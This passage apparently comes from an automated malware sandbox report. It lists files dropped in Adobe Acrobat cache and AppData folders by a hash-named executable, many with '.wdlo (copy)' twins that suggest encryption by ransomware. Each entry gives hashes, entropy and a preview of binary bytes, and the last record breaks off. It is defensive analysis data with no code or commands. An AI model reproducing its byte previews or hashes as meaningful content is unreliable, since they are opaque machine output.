                  Preview:2023/._..f.....2..|....[.=..M......C......*...z...#.uk....r3.4.0...2..x.^.@.fb.q...Z....s..Gr.'.%|.v....R...\..h...L....9.y.......f4@......N..Bf.h..!..O.."J..-y....N.3h.s..:5~)t\.M..QJ..RO.X.iL..k.d=...#....H...$..PH....<.h..N....0.sa.<.%..r.2;.U..z.K......Q.?....r...A......i&I.....+%.c....>G`.iF#.h.`.........u{.fF.Pe..v.h.N.).R$,'.N..:te...?=....q:.>3.l_..Vp......V....S.W..>.M{..j........T.."4...G.....Ozf.!;.W.D....y7.Bw.j..w..K..5.j<........@_d.....S..X......i..uO..%.....wQ.3CJ.%...J,6.hv..........c...&......r@...}zJ......Ci0fXrUHVihm5xsI9Icg243YMPJqd748Ocimkyjt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                  C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old.wdlo (copy)

                  Download File
                  Process:C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):631
                  Entropy (8bit):7.630934009465508
                  Encrypted:false
                  SSDEEP:12:kQJCd+sD1hUL/HEEk7i6Aq1aDVoPrQRFHVlyhPUv/OYOMrB2Uhui36Wcii9a:JUDD1hMHEEku7D1lePWO1UT3zbD
                  MD5:AB1F59CC1841DC3048B30200822C2BC4
                  SHA1:18ABAB9D34D81ED3F516C7FCE4A005292FEC4B96
                  SHA-256:6144E503C36743E654682E504078DBCF5148229AB17379B073F0852FD45C637C
                  SHA-512:26499FBCFD609308E1C5EB5AC68886D29693519CF7675B6067AB6E01EABDBB1C9B2CAF46443FBCD72F91785440D6509AE0CA6D6634282610DED9CB474C0C2433
                  Malicious:false
                  Preview:2023/._..f.....2..|....[.=..M......C......*...z...#.uk....r3.4.0...2..x.^.@.fb.q...Z....s..Gr.'.%|.v....R...\..h...L....9.y.......f4@......N..Bf.h..!..O.."J..-y....N.3h.s..:5~)t\.M..QJ..RO.X.iL..k.d=...#....H...$..PH....<.h..N....0.sa.<.%..r.2;.U..z.K......Q.?....r...A......i&I.....+%.c....>G`.iF#.h.`.........u{.fF.Pe..v.h.N.).R$,'.N..:te...?=....q:.>3.l_..Vp......V....S.W..>.M{..j........T.."4...G.....Ozf.!;.W.D....y7.Bw.j..w..K..5.j<........@_d.....S..X......i..uO..%.....wQ.3CJ.%...J,6.hv..........c...&......r@...}zJ......Ci0fXrUHVihm5xsI9Icg243YMPJqd748Ocimkyjt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                  C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old

                  Download File
                  Process:C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):678
                  Entropy (8bit):7.684522763329319
                  Encrypted:false
                  SSDEEP:12:k2Y3fF94tnCawOnOqe+FPo10dmUTJSxhrOqe60Fh5BQVI2KtnON/qw36Wcii9a:afF9qnCMnRJFq0YEJWCqdo7BKRgON/xT
                  MD5:CD0DAD4102330756B027E372748539A1
                  SHA1:E8EE56E6B55308BB719819F971D1931217153888
                  SHA-256:5356C68643E9EE957B76AECB993A159E8560E4AEF588A8260EF331611C8F5ACF
                  SHA-512:916B5077204599E54C400E7BFBD3979B30C674FBE3A93DBE8881AD5E140901D9D8FEBFAB26793403E2497E41AE1EAA2F4145D231F0E274DB8F30E6654D2F0107
                  Malicious:false
                  Preview:2023/.9B../..i..}.T.K...).......x.,.y......M[0..x..+r..^....9..T...>.I.....l>....!......Rj.S.....3....`. .....B...[..q.a...TDK;.......A.z..:.P+.....6..E...B...+...R...[.@....Y....wBf..}m6.x..e{.!4v\.=U....`.lG.kMO@......'.2..cD,...Y._..{......+&.$.W.js`..S..%..=.z.3.h^..p;..2.4............pI..8n&..lQ.....2b..>.$...{.......b.f..Q.+.....!..OO...O...1..cY....thD. .O./.Y....V..,W.~2x6....kct..;..}W..].A.V.l.ND..._.Il......k.u..3WTV..?n......m!..-=4...R=.p.d...^:v.*..........qR.....C.8).A7OW../.y|....&s.9.WU*...A._bbNV..).]H.M.`...M...."...~.q......).V..L....C..[..d.;^Si0fXrUHVihm5xsI9Icg243YMPJqd748Ocimkyjt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                  C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old.wdlo (copy)

                  Download File
                  Process:C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):678
                  Entropy (8bit):7.684522763329319
                  Encrypted:false
                  SSDEEP:12:k2Y3fF94tnCawOnOqe+FPo10dmUTJSxhrOqe60Fh5BQVI2KtnON/qw36Wcii9a:afF9qnCMnRJFq0YEJWCqdo7BKRgON/xT
                  MD5:CD0DAD4102330756B027E372748539A1
                  SHA1:E8EE56E6B55308BB719819F971D1931217153888
                  SHA-256:5356C68643E9EE957B76AECB993A159E8560E4AEF588A8260EF331611C8F5ACF
                  SHA-512:916B5077204599E54C400E7BFBD3979B30C674FBE3A93DBE8881AD5E140901D9D8FEBFAB26793403E2497E41AE1EAA2F4145D231F0E274DB8F30E6654D2F0107
                  Malicious:false
                  Preview:2023/.9B../..i..}.T.K...).......x.,.y......M[0..x..+r..^....9..T...>.I.....l>....!......Rj.S.....3....`. .....B...[..q.a...TDK;.......A.z..:.P+.....6..E...B...+...R...[.@....Y....wBf..}m6.x..e{.!4v\.=U....`.lG.kMO@......'.2..cD,...Y._..{......+&.$.W.js`..S..%..=.z.3.h^..p;..2.4............pI..8n&..lQ.....2b..>.$...{.......b.f..Q.+.....!..OO...O...1..cY....thD. .O./.Y....V..,W.~2x6....kct..;..}W..].A.V.l.ND..._.Il......k.u..3WTV..?n......m!..-=4...R=.p.d...^:v.*..........qR.....C.8).A7OW../.y|....&s.9.WU*...A._bbNV..).]H.M.`...M...."...~.q......).V..L....C..[..d.;^Si0fXrUHVihm5xsI9Icg243YMPJqd748Ocimkyjt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                  C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LocalPrefs.json

                  Download File
                  Process:C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):818
                  Entropy (8bit):7.714623739789283
                  Encrypted:false
                  SSDEEP:24:YKW8RpK4mBiJIw1nZ3QeBl7luyMsK6bJ7pEJG3zbD:YQymOml0ypN7SA3nD
                  MD5:119F5006698466DDD06AAABF9EBA8616
                  SHA1:13FBE3933083C005E43780E70BFF2A2D707079AE
                  SHA-256:201E0870D2763205ECB7282A125534CE43A99369F2B6123D88352DDDE31EB6DD
                  SHA-512:7E9804EDC261744EBBC81FEBDC96501DFAFA8B1C2A31EADCAD78F668D978B290CABD5CB4428C80B2F25A44601066130282094D4808554C78D07843E7BFB4DB58
                  Malicious:false
                  Preview:{"os_...].1.1..H.R.u."..%n...@?.|..1...&^...G..$.K.!(.....C{FX.-.3..{1...ca)......^.......$.n.e..lfi[.G...:.......V..e.......4....9.F._..fO;X.i.{.....{5.[)YT...0{.s{x.).....Lce.#C.T;..z..<....F.0.....%.V.e..>?o..E.g.].....c_y....se.U....E...AoI.B..^.....=-..R..y.7..W5....zq;..5...{.(....Q.|rp-`.+...tz=......r.;z.c.F...W.r.f!....5..8..A.q..r..q..K#H..c.......~w^.N.....N..k4[....j..../V.!.l..MM.../..(.y7Fr.".^cl.4.uC....i.}1+^.1.o..g........~9..z..a.,.FT...._...t^.)I..&..z...z.i.....p....D....h......Z.Kd.....)..g...../.R..#.#x.S....8cC...X....U$.7|..3.......h....t.PK.B=..^.A...P......4.Aw*..w+:w."..P.c_.u.wj...U!<.=..$..`+t'...J~.au..lv.l.....~(._.R....9.l.1.&.i..F..l...8........S..T.....XO.&.../?.i0fXrUHVihm5xsI9Icg243YMPJqd748Ocimkyjt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                  C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LocalPrefs.json.wdlo (copy)

                  Download File
                  Process:C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):818
                  Entropy (8bit):7.714623739789283
                  Encrypted:false
                  SSDEEP:24:YKW8RpK4mBiJIw1nZ3QeBl7luyMsK6bJ7pEJG3zbD:YQymOml0ypN7SA3nD
                  MD5:119F5006698466DDD06AAABF9EBA8616
                  SHA1:13FBE3933083C005E43780E70BFF2A2D707079AE
                  SHA-256:201E0870D2763205ECB7282A125534CE43A99369F2B6123D88352DDDE31EB6DD
                  SHA-512:7E9804EDC261744EBBC81FEBDC96501DFAFA8B1C2A31EADCAD78F668D978B290CABD5CB4428C80B2F25A44601066130282094D4808554C78D07843E7BFB4DB58
                  Malicious:false
                  Preview:{"os_...].1.1..H.R.u."..%n...@?.|..1...&^...G..$.K.!(.....C{FX.-.3..{1...ca)......^.......$.n.e..lfi[.G...:.......V..e.......4....9.F._..fO;X.i.{.....{5.[)YT...0{.s{x.).....Lce.#C.T;..z..<....F.0.....%.V.e..>?o..E.g.].....c_y....se.U....E...AoI.B..^.....=-..R..y.7..W5....zq;..5...{.(....Q.|rp-`.+...tz=......r.;z.c.F...W.r.f!....5..8..A.q..r..q..K#H..c.......~w^.N.....N..k4[....j..../V.!.l..MM.../..(.y7Fr.".^cl.4.uC....i.}1+^.1.o..g........~9..z..a.,.FT...._...t^.)I..&..z...z.i.....p....D....h......Z.Kd.....)..g...../.R..#.#x.S....8cC...X....U$.7|..3.......h....t.PK.B=..^.A...P......4.Aw*..w+:w."..P.c_.u.wj...U!<.=..$..`+t'...J~.au..lv.l.....~(._.R....9.l.1.&.i..F..l...8........S..T.....XO.&.../?.i0fXrUHVihm5xsI9Icg243YMPJqd748Ocimkyjt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                  C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log

                  Download File
                  Process:C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):3947
                  Entropy (8bit):7.959157875191364
                  Encrypted:false
                  SSDEEP:96:gSMBB0thBEMsbmiy6jdtqKnWvPJz5n7+hDzpImWE2y4b:gzBgsbFZtdnWvPJzVGGS2H
                  MD5:C2C49F015F69C2C943F5300E7AE5A2AE
                  SHA1:553EA6D30FB22D22EF3115CC2719F4937DBEC5EA
                  SHA-256:933EF9D2E7586A997445A27642B4FE427DAB2C4B42D5B696A30D86404702EC5D
                  SHA-512:5C6380F3329D89A2FCFF477E897BEA7904DC63DEBEF69997B27D48372C1443910757F326DEEEA3432AAB5CD5EE2BA901844089B7A68B37DCF1E0E3C94FF696A0
                  Malicious:false
                  Preview:*...#.( ..Y{A.....v...^...)....N.DW.G..{.......M.pg..(.4..6Z...ueS.Q.......E..g.7....O.PU@....M.&...*.7.P.;.P....)%.\..\:..Tg...Zm&..-....@...<>.1F.K).H...j4...P...3.=.V\.6.4..d?.u. ....~.df..4.h.4]....fT..H.%..B..&..4C.4A..({>.j.....D..g......O".:..NF.X.;..}.K.V..".*....2e.....q...a..s.....,[.o,.M....R....EK..2...C~....7.?..$.......^5c./.........G..e.&..~....F.....Zm.'..C..`..#..B..u,+...r...tw...|mC=...1*d=+.<P..;..1.z..*k..f-..?..B..7f.=.6...T.[..t.......".z .}..]...P.^...F\.0......N".z....B..K...Y.K.......{s..M.Jx.w.H.k./..#..}......#c..(.p...<3..FR....'U..[./.n.4..'.!..o@.0,Z.G.....Ak.f.G\.:..:.x.Q.`....R.C>u~.Sa<...b........t....$.5h.[J'h..PT..f....}P..n.Q..o..m...G.u..6.'(Y.....UEdQ..e.@%.*:..j....9.........6..~/.s......9.K!&..X.F...y.*..YA...P...USE..NP..........I.c.^FKC:./.('G..O......d..rB9..?......5P....e..:!.2.v>7R.pwo.U.M..N..n..........9.F.p.....-,.V.:...D.q..;.S...6....mO.r...VNT..fQ..u..@...2&.9..T....{...ud.>

                  C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log.wdlo (copy)

                  Download File
                  Process:C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):3947
                  Entropy (8bit):7.959157875191364
                  Encrypted:false
                  SSDEEP:96:gSMBB0thBEMsbmiy6jdtqKnWvPJz5n7+hDzpImWE2y4b:gzBgsbFZtdnWvPJzVGGS2H
                  MD5:C2C49F015F69C2C943F5300E7AE5A2AE
                  SHA1:553EA6D30FB22D22EF3115CC2719F4937DBEC5EA
                  SHA-256:933EF9D2E7586A997445A27642B4FE427DAB2C4B42D5B696A30D86404702EC5D
                  SHA-512:5C6380F3329D89A2FCFF477E897BEA7904DC63DEBEF69997B27D48372C1443910757F326DEEEA3432AAB5CD5EE2BA901844089B7A68B37DCF1E0E3C94FF696A0
                  Malicious:false
                  Preview:*...#.( ..Y{A.....v...^...)....N.DW.G..{.......M.pg..(.4..6Z...ueS.Q.......E..g.7....O.PU@....M.&...*.7.P.;.P....)%.\..\:..Tg...Zm&..-....@...<>.1F.K).H...j4...P...3.=.V\.6.4..d?.u. ....~.df..4.h.4]....fT..H.%..B..&..4C.4A..({>.j.....D..g......O".:..NF.X.;..}.K.V..".*....2e.....q...a..s.....,[.o,.M....R....EK..2...C~....7.?..$.......^5c./.........G..e.&..~....F.....Zm.'..C..`..#..B..u,+...r...tw...|mC=...1*d=+.<P..;..1.z..*k..f-..?..B..7f.=.6...T.[..t.......".z .}..]...P.^...F\.0......N".z....B..K...Y.K.......{s..M.Jx.w.H.k./..#..}......#c..(.p...<3..FR....'U..[./.n.4..'.!..o@.0,Z.G.....Ak.f.G\.:..:.x.Q.`....R.C>u~.Sa<...b........t....$.5h.[J'h..PT..f....}P..n.Q..o..m...G.u..6.'(Y.....UEdQ..e.@%.*:..j....9.........6..~/.s......9.K!&..X.F...y.*..YA...P...USE..NP..........I.c.^FKC:./.('G..O......d..rB9..?......5P....e..:!.2.v>7R.pwo.U.M..N..n..........9.F.p.....-,.V.:...D.q..;.S...6....mO.r...VNT..fQ..u..@...2&.9..T....{...ud.>

                  C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old

                  Download File
                  Process:C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):666
                  Entropy (8bit):7.683874223061616
                  Encrypted:false
                  SSDEEP:12:kSp20POj6TJrE8lDN7v/daJiCn4gb8USR3HwCU//Ai8TbGxcGrxdwWS4Y36Wciik:do6Oj6Tm8lBT/QiCnJgR3HE//rR+6xWz
                  MD5:3D02790333AC68BB510F1D11F0EE92C1
                  SHA1:1D18EE5EF29A9806B72C7A51CBDA0B83A228D858
                  SHA-256:F97AED018237A31183226001773F93689EF45100236391A1758012CDF095B157
                  SHA-512:AF3E7ED8ADA52FE4445087B97084C59E3334F178187A31185D76411A2C8CF69474E879C865DEAAECDF98737E5F50A8916FE760F3EDB8C34391A3B09BD2792BC8
                  Malicious:false
                  Preview:2023/.w[~.....?.....v.....b..(.(..U...4.[..Dd...`..i.........V..~T......4-8E...d1...;.......= ..CZ........~..Np.~.)..G/J*..?.x..}......zAm..|..`.j:..^...q...;^.F@.w...~n#..|....I\......x.h....H..`S."....5.O..I.3j....t...Y_....a..y.5....s.vS...Co.R.@...H.e.?..RPIW.4..YH......L.?I..........E..8M75....Q)4..).Z@...........=..q.a.....m..&.Z..........P.05]W..:.1...S..c.A>T...>Y.bT.1'...z..#az..@...N~.4.&.....'...#.."Y......N<.m..._;.1....i....CM......e"....!i.>Q.6...+...MI._u.k.3.u/.........Vi...k%.Y*..!..!..^}....Q=..du..V.d6.">)...cE..i0fXrUHVihm5xsI9Icg243YMPJqd748Ocimkyjt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                  C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old.wdlo (copy)

                  Download File
                  Process:C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):666
                  Entropy (8bit):7.683874223061616
                  Encrypted:false
                  SSDEEP:12:kSp20POj6TJrE8lDN7v/daJiCn4gb8USR3HwCU//Ai8TbGxcGrxdwWS4Y36Wciik:do6Oj6Tm8lBT/QiCnJgR3HE//rR+6xWz
                  MD5:3D02790333AC68BB510F1D11F0EE92C1
                  SHA1:1D18EE5EF29A9806B72C7A51CBDA0B83A228D858
                  SHA-256:F97AED018237A31183226001773F93689EF45100236391A1758012CDF095B157
                  SHA-512:AF3E7ED8ADA52FE4445087B97084C59E3334F178187A31185D76411A2C8CF69474E879C865DEAAECDF98737E5F50A8916FE760F3EDB8C34391A3B09BD2792BC8
                  Malicious:false
                  Preview:2023/.w[~.....?.....v.....b..(.(..U...4.[..Dd...`..i.........V..~T......4-8E...d1...;.......= ..CZ........~..Np.~.)..G/J*..?.x..}......zAm..|..`.j:..^...q...;^.F@.w...~n#..|....I\......x.h....H..`S."....5.O..I.3j....t...Y_....a..y.5....s.vS...Co.R.@...H.e.?..RPIW.4..YH......L.?I..........E..8M75....Q)4..).Z@...........=..q.a.....m..&.Z..........P.05]W..:.1...S..c.A>T...>Y.bT.1'...z..#az..@...N~.4.&.....'...#.."Y......N<.m..._;.1....i....CM......e"....!i.>Q.6...+...MI._u.k.3.u/.........Vi...k%.Y*..!..!..^}....Q=..du..V.d6.">)...cE..i0fXrUHVihm5xsI9Icg243YMPJqd748Ocimkyjt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                  C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\shared_proto_db\000003.log

                  Download File
                  Process:C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):387
                  Entropy (8bit):7.335130360053761
                  Encrypted:false
                  SSDEEP:12:X9i56/mvM+b2CzlTbS5Ez8Haga0gFwJ1hXnC1djd36Wcii9a:XPmvM+aqlTbS2IHpr273zbD
                  MD5:06141C1137276F61A28515CFA772BAE5
                  SHA1:208F172F657E397596E14D631423C71B8D6CBFF0
                  SHA-256:54AC0C919F4B109A1AED2B8A478BF00330F2C7549927D5632AFF791367244550
                  SHA-512:81084879BCEE3D69E34266B996746EEC008425AE67C5DB7795B242547A57AFEDC6900CA4DFFB5C1645A3BC0AA8F4381348FB1A6D1B49730F3AA6AADFBF17D934
                  Malicious:false
                  Preview:O7U:..\ ..u.U...x..Z.r..2.g....>2#.....A&k....f.../..).O.D..t..Eej.2uT.9Wq.C.1.%......5..D..pV..6.......--~.<...._!8....ww.......A..l.6W(.Q.1!......F....cUI.....5..D......P..n..+A+..k...-...a..U9).c......r.....U<ZN.b>gi'Dvu.....}...u...yp..6{.....7!M..&_.l*X.1?....I..j*u.../'_;..$..8.t..Cg{...B...i0fXrUHVihm5xsI9Icg243YMPJqd748Ocimkyjt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                  C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\shared_proto_db\000003.log.wdlo (copy)

                  Download File
                  Process:C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):387
                  Entropy (8bit):7.335130360053761
                  Encrypted:false
                  SSDEEP:12:X9i56/mvM+b2CzlTbS5Ez8Haga0gFwJ1hXnC1djd36Wcii9a:XPmvM+aqlTbS2IHpr273zbD
                  MD5:06141C1137276F61A28515CFA772BAE5
                  SHA1:208F172F657E397596E14D631423C71B8D6CBFF0
                  SHA-256:54AC0C919F4B109A1AED2B8A478BF00330F2C7549927D5632AFF791367244550
                  SHA-512:81084879BCEE3D69E34266B996746EEC008425AE67C5DB7795B242547A57AFEDC6900CA4DFFB5C1645A3BC0AA8F4381348FB1A6D1B49730F3AA6AADFBF17D934
                  Malicious:false
                  Preview:O7U:..\ ..u.U...x..Z.r..2.g....>2#.....A&k....f.../..).O.D..t..Eej.2uT.9Wq.C.1.%......5..D..pV..6.......--~.<...._!8....ww.......A..l.6W(.Q.1!......F....cUI.....5..D......P..n..+A+..k...-...a..U9).c......r.....U<ZN.b>gi'Dvu.....}...u...yp..6{.....7!M..&_.l*X.1?....I..j*u.../'_;..$..8.t..Cg{...B...i0fXrUHVihm5xsI9Icg243YMPJqd748Ocimkyjt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                  C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\shared_proto_db\metadata\000003.log

                  Download File
                  Process:C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:modified
                  Size (bytes):460
                  Entropy (8bit):7.440478804641666
                  Encrypted:false
                  SSDEEP:12:G/Ha/R5uZDA0vg/tMl02FwB2gtiRNI62O6036Wcii9a:GKRsDAWgFMl0n5tTfOD3zbD
                  MD5:B0E6A790CD8456B7B1BE3AF28538BA32
                  SHA1:D9E44169CF1444778FFDCB262D460C872F12B41A
                  SHA-256:C8E888A540F7BE048D1392DB1CF7EC94687E3D0C89E94567F55225CE4DF5CD75
                  SHA-512:0D9AC0EEAA9AF145B73253460EC9683CF91BC47EF37C40EA7FB1675662DB7FAC8206A1F93A53787C7F3BDA52D06AA5FF34CECCE0731CB30CA72C4DC0DED38562
                  Malicious:false
                  Preview:.h.6........{.-7...~....~...........Cz..!.I.R,8...1.,.Y.o......U..<~WLj.k...".5..XO.[.RI?.v.N...z..J....U.....P..6 ..8V5...\..2.V}/.1...<p..Fv...PyU..2./`./N...1.H..,Hw..0..EI.Y[....)..&FrhL....w0.jD............d...y.... ....od../...o.._Sq.V,.|.....E4~%v.-r......L.w...s.)>....1...<U.j.....i...+.j..r....9.L..BX*.......r.Wv.>.x..G5.]Ql....9#.......3.2....8h&....Mi0fXrUHVihm5xsI9Icg243YMPJqd748Ocimkyjt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                  C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\shared_proto_db\metadata\000003.log.wdlo (copy)

                  Download File
                  Process:C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):460
                  Entropy (8bit):7.440478804641666
                  Encrypted:false
                  SSDEEP:12:G/Ha/R5uZDA0vg/tMl02FwB2gtiRNI62O6036Wcii9a:GKRsDAWgFMl0n5tTfOD3zbD
                  MD5:B0E6A790CD8456B7B1BE3AF28538BA32
                  SHA1:D9E44169CF1444778FFDCB262D460C872F12B41A
                  SHA-256:C8E888A540F7BE048D1392DB1CF7EC94687E3D0C89E94567F55225CE4DF5CD75
                  SHA-512:0D9AC0EEAA9AF145B73253460EC9683CF91BC47EF37C40EA7FB1675662DB7FAC8206A1F93A53787C7F3BDA52D06AA5FF34CECCE0731CB30CA72C4DC0DED38562
                  Malicious:false
                  Preview:.h.6........{.-7...~....~...........Cz..!.I.R,8...1.,.Y.o......U..<~WLj.k...".5..XO.[.RI?.v.N...z..J....U.....P..6 ..8V5...\..2.V}/.1...<p..Fv...PyU..2./`./N...1.H..,Hw..0..EI.Y[....)..&FrhL....w0.jD............d...y.... ....od../...o.._Sq.V,.|.....E4~%v.-r......L.w...s.)>....1...<U.j.....i...+.j..r....9.L..BX*.......r.Wv.>.x..G5.]Ql....9#.......3.2....8h&....Mi0fXrUHVihm5xsI9Icg243YMPJqd748Ocimkyjt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                  C:\Users\user\AppData\Local\.curlrc

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):342
                  Entropy (8bit):7.288599291372987
                  Encrypted:false
                  SSDEEP:6:KWyMG3sAlSeXFutoLdp2YbNetBu0YjHLEHLpaObZOsVolWbz6Wcii96Z:NyMG3JVbD2YbkTOrEHks36Wcii9a
                  MD5:5FBE7A9DF37FA44FD58B83B18AA3DCAB
                  SHA1:1F7A14A9CEE594A5DDBEDFBB2537A3165C3C1E53
                  SHA-256:4533EFB5A3C7E28D286220AF0752AA9DFC2145AE3975EB47304E93FD41C1E00B
                  SHA-512:118CC5E1739A67963654514F81A7E7ACA6065ADE58C79F8DCCB6604CA00A4B7370958156F3F3406BBA9F030551B793512A010C8D837BE5CFDFBBFAE87FB3691A
                  Malicious:false
                  Preview:insecjq.O.!..d3.r.&.*..vw.c....q[.`..g.n8.OdZ...#.g.+D+..v.v.7|.c.dU..Z.p..a.. h...4..v'>p...T.f.......mp.K....B.A.....}.$..*.......Kzt..6.....][.8...>......f....>....-.. ..e........a...$...O......(e...=].7..w......S.+.<..Y.h].......)P.Y.,/.i0fXrUHVihm5xsI9Icg243YMPJqd748Ocimkyjt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeCMapFnt23.lst

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:PostScript document text
                  Category:dropped
                  Size (bytes):1567
                  Entropy (8bit):7.878768810417138
                  Encrypted:false
                  SSDEEP:48:akju5F1g3swaLGe63nfBwHaoYAqPfMST3nD:akju71osNSe63nfBwLOMSX
                  MD5:B79FEE0E51B848B06E39F11AF7D9A424
                  SHA1:F6A7321A85A6E6C1CA2081A033E82461415CCF00
                  SHA-256:390BD7681ED6DE6A133EA6DA637DAAAD918148F3EDAFD251C82ECEACDC717364
                  SHA-512:D9222E673E7752CD6886BA663BA9D98984D7C1F48C18F83A5616983898A02617384032AE0BD5E71C4AD0CD2832C14F165D7A6E7E30EE33FDD6F53FB88746A9BD
                  Malicious:false
                  Preview:%!Ado....83i..<b....&H.$.6...%&../.....;7...2/#.....3..8U.{(>.r.......Hm..3/ze.,.....{..(O.Z.D......&..._...>.w':F.........{...&.RD-.IK...CA.;a2U.Aa..D^..i..I...w.Y.SU......w....V....^.OI.....ou.^.4....._...."=..zH..}X:p.2 .zSk.F..Kb.B..?E,..sK>..!y(o-..i9..<D'.......6.....Y..w\d.yD.....Wc.).x.x.Mb...wi..F.h..........ey:....3.imN..*.Hh.q.B.-....w...&...-IJ.`.....C..../..D..\..X.1.....k......L}......g...K.=.,I..|K..]..\hT.....8........n<}.......S..84E..L..E..Nc9qH6.....U|..w.'.f{(..q.;|.h']..$U.....Z..F..[.X"..b...qN..*EK.."..g..v..'4T.5G..E...,.8.,.}...s8....].g./.,........"^.$$..V[W..M.h/S/V..R=.dr....3....]...tt.;<.d.k....D.\b,uX.Q.D..y..:Zu> 4...7N.&..J.....n|M.............6.o...U......`........+$y.t.>.=K...*...e..wi.G..j.(N...!.y........L.2...u4..5x.o..S.0-.x.Y6..b:.w.'.....1.."J.O.'SI6;5al.G..!oZqK.....H.h?.?.g9..y....}..#...e.?..dLr.)..xkyH.,./...>U....}.v.#..9.(G.c.. 4...P..Q.zh.A!..qU#I.x.].P...-8+..V..h.g...]>...k...%YvC....h&....

                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt23.lst

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:PostScript document text
                  Category:dropped
                  Size (bytes):185433
                  Entropy (8bit):7.877368933507415
                  Encrypted:false
                  SSDEEP:3072:ejJIEi7tcSvDqqkmxwWpgUDFQCmmVfussvmrS/L2ap0X6NKYErzHaXRXE07Zman2:sIXcCDaKHL7mmVYBaaCX6NKYErz6XRX0
                  MD5:D5E3B5D23BCF63B56753325978CEF09A
